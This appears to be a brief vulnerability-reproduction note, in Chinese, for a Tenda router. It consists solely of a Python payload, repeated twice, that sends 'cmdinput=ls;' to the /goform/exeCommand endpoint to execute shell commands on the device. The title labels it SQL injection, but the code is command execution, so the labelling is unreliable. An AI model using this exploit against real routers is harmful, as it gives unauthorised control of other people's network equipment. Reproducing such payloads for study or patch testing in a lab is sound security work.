T8-3Tenda-路由器-SQL
漏洞复现:
payload:
import requests
ip = '192.168.74.145'
url = f"http://{ip}/goform/exeCommand"
data = "cmdinput=ls;"
ret = requests.post(url=url,data=data)
payload:
import requests
ip = '192.168.74.145'
url = f"http://{ip}/goform/exeCommand"
data = "cmdinput=ls;"
ret = requests.post(url=url,data=data)